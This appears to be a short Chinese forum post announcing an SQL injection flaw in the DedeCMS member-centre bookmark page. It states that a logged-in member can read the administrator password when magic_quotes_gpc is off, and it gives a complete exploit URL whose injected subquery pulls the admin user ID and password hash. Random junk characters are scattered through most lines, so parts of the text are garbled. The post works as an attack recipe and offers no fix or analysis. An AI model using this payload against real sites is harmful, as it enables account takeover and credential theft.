DedeCMS会员中心SQL注射漏洞7 [# J+ A3 e4 j& p1 ^1 E
需要magic_quotes_gpc = Off9 v! x4 H4 S7 u) h; }6 V8 [7 i3 R
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
& x- z. t2 _ X/ A; K, x, n9 |
# H1 E8 y# G- ^4 g; m: J0 O w5 r# FDedeCMS会员中心书签管理SQL注射漏洞
' G9 W; K* z: }' o3 k成功利用该漏洞可获得管理员密码7 I/ g, H; v, I4 h& L, T
. W. n% Y+ c" c/ E, @, K3 i% c" P
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
( t+ g2 T! L6 R; L- c3 I& E0 ~ 5 {/ C4 w. c8 o. V9 H: ~% S) G4 K
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
3 W' f) N8 l9 x |